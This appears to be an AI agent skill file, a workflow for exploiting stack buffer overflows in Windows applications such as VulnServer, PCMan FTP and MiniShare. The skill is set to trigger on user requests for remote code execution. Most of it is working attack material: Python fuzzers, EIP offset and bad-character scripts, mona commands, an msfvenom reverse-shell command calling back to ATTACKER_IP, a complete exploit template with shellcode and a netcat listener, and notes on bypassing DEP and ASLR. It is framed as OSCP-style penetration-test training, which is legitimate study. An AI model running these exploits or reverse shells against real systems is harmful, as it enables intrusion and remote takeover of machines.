| name | Buffer Overflow Exploitation |
| description | This skill should be used when the user asks to "exploit buffer overflow vulnerabilities", "develop stack-based exploits", "find EIP offset", "identify bad characters", "create shellcode payloads", "perform fuzzing for crashes", or "gain remote code execution via memory corruption". It provides comprehensive techniques for discovering and exploiting buffer overflow vulnerabilities in Windows applications. |
| version | 1.0.0 |
| tags | ["buffer-overflow","exploit-development","shellcode","memory-corruption","fuzzing","windows-exploitation"] |
Buffer Overflow Exploitation
Purpose
Execute systematic buffer overflow vulnerability discovery and exploitation against Windows applications to achieve remote code execution. This skill enables comprehensive fuzzing to identify crashes, determination of EIP offset, bad character identification, JMP ESP location discovery, shellcode generation, and final exploit construction for penetration testing and OSCP-style assessments.
Inputs / Prerequisites
Required Tools
- Immunity Debugger with Mona.py plugin installed
- Python 2.7 for exploit script development
- Metasploit Framework (msfvenom, pattern_create, pattern_offset)
- Netcat for reverse shell listener
- Target Windows application with known vulnerability
Environment Setup
- Windows VM with vulnerable application
- Kali Linux or attacker machine
- Network connectivity between machines
- Mona.py copied to
C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands
Knowledge Requirements
- Understanding of x86 assembly and memory layout
- Familiarity with stack structure (ESP, EIP, EBP)
- Basic Python socket programming
- Understanding of shellcode encoding
Outputs / Deliverables
Primary Outputs
- Working exploit achieving remote code execution
- Reverse shell on target system
- Documented exploitation process
- Exploit template for similar vulnerabilities
Evidence Artifacts
- Crash offset documentation
- Bad character list
- JMP ESP address with module info
- Complete exploit script
Core Workflow
Phase 1: Fuzzing the Application
Create Fuzzing Script
Systematically send increasing buffer sizes to identify crash point:
import socket
from time import sleep
length = 100
while True:
try:
print "Fuzzing with %d bytes" % length
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))
s.recv(1024)
s.send('COMMAND ' + 'A' * length + '\r\n')
s.recv(1024)
s.close()
sleep(1)
length += 100
except:
print "Crashed at %d bytes" % length
exit()
Monitor in Immunity Debugger
- Attach Immunity Debugger to target process
- Press F9 to run the application
- Run fuzzer and note crash byte count
- Observe EIP value (should show
41414141 for 'AAAA')
Phase 2: Finding EIP Offset
Generate Unique Pattern
Create a non-repeating pattern to identify exact offset:
msf-pattern_create -l 2100
!mona pattern_create 2100
Pattern saved to: C:\Program Files\Immunity Inc\Immunity Debugger\pattern.txt
Send Pattern to Application
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))
pattern = "Aa0Aa1Aa2Aa3..."
s.recv(1024)
s.send('COMMAND ' + pattern + '\r\n')
s.recv(1024)
s.close()
Determine Offset
After crash, note EIP value from Immunity Debugger:
msf-pattern_offset -q 396F4338
!mona pattern_offset 396F4338
Result: Exact position found (e.g., offset 2006)
Verify Offset Control
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))
offset = 2006
buffer = 'A' * offset + 'B' * 4 + 'C' * 400
s.recv(1024)
s.send('COMMAND ' + buffer + '\r\n')
s.recv(1024)
s.close()
Verify EIP shows 42424242 (BBBB) confirming offset control.
Phase 3: Bad Character Identification
Generate Bad Character Array
Create complete byte array for testing:
!mona bytearray
Output saved to: C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.txt
Standard Bad Character Array
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
Send Bad Characters
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))
offset = 2006
buffer = 'A' * offset + 'B' * 4 + badchars
s.recv(1024)
s.send('COMMAND ' + buffer + '\r\n')
s.recv(1024)
s.close()
Analyze in Immunity
- Right-click ESP register → Follow in Dump
- Examine hex dump for truncated or corrupted sequences
- Note character before corruption as bad character
Automated Bad Character Detection
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a ESP_ADDRESS
!mona bytearray -cpb "\x00\x0a\x0d"
Common Bad Characters
| Character | Hex | Description |
|---|
| NULL | \x00 | String terminator |
| LF | \x0a | Line feed |
| CR | \x0d | Carriage return |
| Space | \x20 | Whitespace delimiter |
Phase 4: Finding JMP ESP
Search for JMP ESP Instruction
Locate a reliable return address to redirect execution:
!mona jmp -r esp
!mona find -s "\xff\xe4" -m essfunc.dll
!mona modules
Module Selection Criteria
Choose modules with these protections DISABLED:
- ASLR: False
- Rebase: False
- SafeSEH: False
- NXCompat: False
Manual JMP ESP Search
Using nasm_shell to get opcode:
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000 FFE4 jmp esp
Search in Immunity: !mona find -s "\xff\xe4" -m MODULE.dll
Convert Address to Little Endian
Found address: 0x625011AF
Little endian format: \xAF\x11\x50\x62
Using struct.pack:
import struct
jmpesp = struct.pack("<I", 0x625011AF)
Phase 5: Shellcode Generation
Generate Reverse Shell Payload
msfvenom -p windows/shell_reverse_tcp \
LHOST=ATTACKER_IP \
LPORT=4444 \
EXITFUNC=thread \
-b "\x00\x0a\x0d" \
-e x86/shikata_ga_nai \
-f python \
-v shellcode
Parameters Explained
| Parameter | Purpose |
|---|
-p | Payload type |
LHOST | Attacker IP for callback |
LPORT | Attacker listening port |
EXITFUNC=thread | Clean exit without crashing |
-b | Bad characters to avoid |
-e | Encoder for obfuscation |
-f python | Output format |
-v shellcode | Variable name |
Phase 6: Final Exploit Construction
Complete Exploit Template
import socket
import struct
import sys
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <TARGET_IP>\n"
sys.exit()
target_ip = sys.argv[1]
target_port = 9999
offset = 2006
jmpesp = struct.pack("<I", 0x625011AF)
nops = "\x90" * 20
shellcode = (
"\xba\xbd\x3a\xaf\xba\xd9\xf7\xd9\x74\x24\xf4"
"\x5e\x31\xc9\xb1\x52\x31\x56\x12\x03\x56\x12"
)
buffer = "A" * offset
buffer += jmpesp
buffer += nops
buffer += shellcode
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.recv(1024)
s.send('TRUN .' + buffer + '\r\n')
s.recv(1024)
s.close()
print "[+] Exploit sent successfully"
except:
print "[-] Connection failed"
Execute Exploit
nc -lvnp 4444
python2 exploit.py TARGET_IP
Quick Reference
Mona Commands Cheatsheet
| Command | Purpose |
|---|
!mona pattern_create LENGTH | Create unique pattern |
!mona pattern_offset EIP | Find offset position |
!mona bytearray | Generate byte array |
!mona bytearray -cpb "\x00" | Exclude bad chars |
!mona compare -f FILE -a ADDR | Compare memory |
!mona jmp -r esp | Find JMP ESP |
!mona modules | List loaded modules |
!mona find -s BYTES -m MODULE | Search in module |
Exploitation Workflow Summary
1. Fuzz → Find crash point
2. Pattern → Determine EIP offset
3. Verify → Control EIP with known value
4. Badchars → Identify restricted bytes
5. JMP ESP → Find return address
6. Shellcode → Generate payload
7. Exploit → Combine and execute
Buffer Structure
[PADDING][EIP][NOP SLED][SHELLCODE]
| | | |
A*N JMP ESP \x90*20 msfvenom output
Common Offsets Reference
| Application | Command | Offset |
|---|
| VulnServer TRUN | TRUN . | 2006 |
| MiniShare 1.4.1 | GET | 1787 |
| PCMan FTP PORT | PORT | 2006 |
| FreeFloat FTP USER | USER | 230 |
Constraints and Guardrails
Operational Boundaries
- Test only against authorized systems and applications
- Use isolated lab environments for exploit development
- Document all testing activities and findings
- Avoid testing against production systems
Technical Limitations
- DEP (Data Execution Prevention) prevents stack execution
- ASLR randomizes module addresses each reboot
- Stack canaries detect buffer overflows
- SafeSEH restricts exception handler exploitation
Bypass Considerations
- DEP Bypass: ROP chains, ret2libc techniques
- ASLR Bypass: Information leaks, fixed modules
- Canary Bypass: Format string bugs, heap overflow
Examples
Example 1: VulnServer TRUN Exploitation
Fuzzing Result: Crash at ~2100 bytes
EIP Offset: 2006 bytes
Bad Characters: \x00 only
JMP ESP: 0x625011AF (essfunc.dll)
Exploit:
buffer = "A" * 2006
buffer += "\xAF\x11\x50\x62"
buffer += "\x90" * 20
buffer += shellcode
Example 2: PCMan FTP PORT Command
Fuzzing Result: Crash at ~2100 bytes
EIP Offset: 2006 bytes
Bad Characters: \x00\x0a\x0d
JMP ESP: 0x75E2798D (SHELL32.dll)
Exploit Structure:
s.send("USER Anonymous\r\n")
s.recv(1024)
s.send("PASS pass\r\n")
s.recv(1024)
s.send("PORT " + buffer + "\r\n")
Example 3: MiniShare 1.4.1 HTTP GET
Fuzzing Result: Crash at ~1800 bytes
EIP Offset: 1787 bytes
Bad Characters: \x00\x0d
JMP ESP: 0x7E6B30D7 (SHELL32.dll)
Buffer Format:
metodo_http = "GET "
buffer = "A" * 1787 + jmpesp + nops + shellcode
cabecera_http = " HTTP/1.1\r\n\r\n"
payload = metodo_http + buffer + cabecera_http
Troubleshooting
Exploit Crashes Application But No Shell
- Verify shellcode bad characters are excluded
- Increase NOP sled size for decoder space
- Check LHOST/LPORT in shellcode match listener
- Ensure EXITFUNC=thread for stable exit
EIP Not Overwritten as Expected
- Verify offset calculation is correct
- Check for additional bad characters affecting padding
- Ensure complete pattern reaches EIP position
JMP ESP Address Causes Crash
- Verify module has ASLR disabled
- Check address doesn't contain bad characters
- Confirm address valid after application restart
Shellcode Not Executing
- DEP may be enabled - check module protections
- NOP sled too short for decoder
- Bad characters corrupting shellcode
- Try different encoder or manual encoding
Application Crashes Before Shell
- EXITFUNC incorrect - try
thread, process, or seh
- Shellcode size exceeds available buffer space
- Stack alignment issues - add stack adjustment
